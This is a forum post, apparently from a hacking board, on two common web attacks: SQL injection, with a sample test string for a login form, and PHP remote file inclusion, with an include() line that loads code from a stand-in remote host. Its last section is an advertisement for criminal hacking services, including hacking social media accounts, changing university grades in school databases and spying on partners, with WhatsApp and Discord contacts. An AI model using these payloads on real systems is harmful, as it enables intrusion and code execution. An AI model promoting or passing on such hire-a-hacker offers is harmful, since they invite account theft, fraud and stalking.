tamla4 0 There are many ways that can make your website to get hacked but here I am going to discuss the most common methods used. 1. INJECTION ATTACKS I will start with injection exploits because most IT professionals, even though they have cursory basic understanding of the dangers, leave too many sites open to the vulnerability, according to the Open Web Applications Security Project (OWASP). Injection is passing malicious user-supplied data to an interpreter. The most common form is SQL Injection, where the hacker passes a SQL command to your database. Are you at risk? Let’s find out. Find a page on your application that accepts user-supplied information to access a database: A login form, signup form, or “forgot password” form is a good start. A dynamic page that uses URL variables such as ID (product information pages are good for this). Knowing that the database command takes the user-supplied information into a WHERE clause, try to finish the command with SQL that will throw an error. So on our login form, perhaps we want to try putting this into the username: username’ or fake_column IS NULL. If you are greeted with a database error message page, success! You’ve hacked your own site. You can follow a step by step tutorial on how to Hidden Content: You must reply to see links here. The Risk: Our hack above seems pretty harmless, but it just finds the place in your application susceptible to malicious code injection. Once a hacker knows they have an unprotected line to your database, the possibilities are endless: vandalism, data theft, or even total system compromise. 2. REMOTE FILE INCLUSIONS If your site doesn’t use any PHP, then good news: you’re safe of this sort of attack. But according to the SANS Institute, PHP is the most popular web application framework. When used properly, PHP can be a very powerful and useful tool for a number of different applications. Perhaps because of its popularity, it’s also an enticing target for hackers to find exploits. The PHP function allow_url_fopen is a favorite for hackers not only because it allows them to run their scripts on your site, but also because it is enabled by default. Are you at risk? Let’s figure it out. Find a PHP script that uses the include() function. If you have a path name in the include, change it to the absolute URL equivalent. If the file still works after this change, success! You’ve just hacked your own site. The Risk: Okay, the hacker might need to do a little more legwork in this example, but it severely increases the surface area for attack. All a hacker needs to do is find one file to manipulate and add the line:include(‘http://www.example.com/malicious_code.php’) and you are compromised. Compromise might include password stealing, remote root kit installation, and in some cases complete system compromise. 3. For more tutorial We are a group of professional hackers,we are seasoned and professional hackers ...as a way of giving back to the world we are here to help with all hacking jobs some of which are ,If you need any help in hacking We carry out services like social networks like Facebook Instagram Twitter Whats app Line Skype Hack We also delete unwanted online pictures and videos on any website HACK INTO ANY SCHOOL DATABASE AND CHANGE UNIVERSITY GRADES, no matter how secured...Find out if your partiner is cheating ...... >whatsapp : +1 682 302 5207= Discord ID: holyhck#1248 Quote Share this post Link to post Share on other sites
